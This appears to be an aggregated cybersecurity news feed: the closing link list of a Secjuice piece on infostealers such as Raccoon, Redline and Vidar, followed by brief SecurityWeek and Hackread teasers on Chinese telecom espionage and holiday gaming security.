There are dangers out there, and with the right knowledge – which is readily available but often either hard to find or overabundant – you can stay safe. Go safely into and through 2025! 

Sources, Resources, and More Information

Raccoon

https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/raccoon-infostealer

https://www.cyberark.com/resources/threat-research-blog/raccoon-the-story-of-a-typical-infostealer

https://darktrace.com/blog/the-resurgence-of-the-raccoon-steps-of-a-raccoon-stealer-v2-infection-part-2

https://cyberint.com/blog/financial-services/raccoon-stealer/

https://www.justice.gov/usao-wdtx/victim-assistance-raccoon-infostealer

https://www.linkedin.com/pulse/raccoon-stealer-announces-return-new-features-tools-mihir-bagwe

https://www.cyber.nj.gov/threat-landscape/malware/trojans/raccoon

https://www.cid.army.mil/Portals/118/Documents/Cyber-Flyers/Cyberflyer_MalwareAsAServiceRaccoonInfostealer_11-16-2022.pdf

https://www.infostealers.com/article/approaching-stealers-devs-a-brief-interview-with-recordbreaker/

https://www.kelacyber.com/wp-content/uploads/2023/05/KELA_Research_Infostealers_2023_full-report.pdf

https://www.bleepingcomputer.com/news/security/ukrainian-charged-for-operating-raccoon-stealer-malware-service/

Redline

Good and detailed summary: https://cyberflorida.org/redline-stealer-malware-analysis/

2024 disruption: https://www.bankinfosecurity.com/dutch-police-fbi-infiltrate-info-stealer-infrastructure-a-26643

https://www.welivesecurity.com/en/eset-research/life-crooked-redline-analyzing-infamous-infostealers-backend/

https://www.kroll.com/en/insights/publications/cyber/redlinestealer-malware

https://proton.me/blog/infostealers

https://www.threatspike.com/blogs/redline-part-1

https://nordvpn.com/blog/redline-stealer-malware/

https://www.linkedin.com/directory/articles/t-402

https://flare.io/learn/resources/blog/redline-stealer-malware/

https://www.csk.gov.in/alerts/RedLine_infostealer_malware.html

https://securityscorecard.com/research/detailed-analysis-redline-stealer/

https://www.cloudsek.com/blog/technical-analysis-of-the-redline-stealer

https://www.infostealers.com/technique/redline-stealer/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer

https://www.splunk.com/en_us/blog/security/do-not-cross-the-redline-stealer-detections-and-analysis.html 

https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

https://flashpoint.io/blog/redline-meta-takedown-infostealer/

https://intel471.com/blog/redline-and-meta-the-story-of-two-disrupted-infostealers

Vidar

https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/what-is-vidar-malware/

https://www.hhs.gov/sites/default/files/vidar-malware-analyst-note-tlpclear.pdf

https://wazuh.com/blog/detecting-vidar-infostealer-with-wazuh/

https://www.cyfirma.com/research/vidar-stealer-an-in-depth-analysis-of-an-information-stealing-malware/

https://blog.eclecticiq.com/polish-healthcare-industry-targeted-by-vidar-infostealer-likely-linked-to-djvu-ransomware

https://darktrace.com/blog/a-surge-of-vidar-network-based-details-of-a-prolific-info-stealer

Bot Framework

https://en.wikipedia.org/wiki/Infostealer

https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction

https://lumu.io/blog/infostealers-silent-threat-compromising-world/

https://cyberint.com/blog/research/the-new-infostealer-in-town-the-continental-stealer/

https://flashpoint.io/blog/protecting-against-infostealer-malware/

https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data

https://www.cyberark.com/resources/threat-research-blog/raccoon-the-story-of-a-typical-infostealer

https://flashpoint.io/blog/understanding-seidr-infostealer-malware/

Secjuice – ​Read More

A 9th Telecoms Firm Has Been Hit by a Massive Chinese Espionage Campaign, the White House Says

A top White House official said at least eight U.S. telecom firms and dozens of nations have been impacted by a Chinese hacking campaign.

The post A 9th Telecoms Firm Has Been Hit by a Massive Chinese Espionage Campaign, the White House Says appeared first on SecurityWeek.

SecurityWeek – ​Read More

Secure Gaming During the Holidays

Secure Gaming during holidays is essential as cyberattacks rise by 50%. Protect accounts with 2FA, avoid fake promotions,…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – ​Read More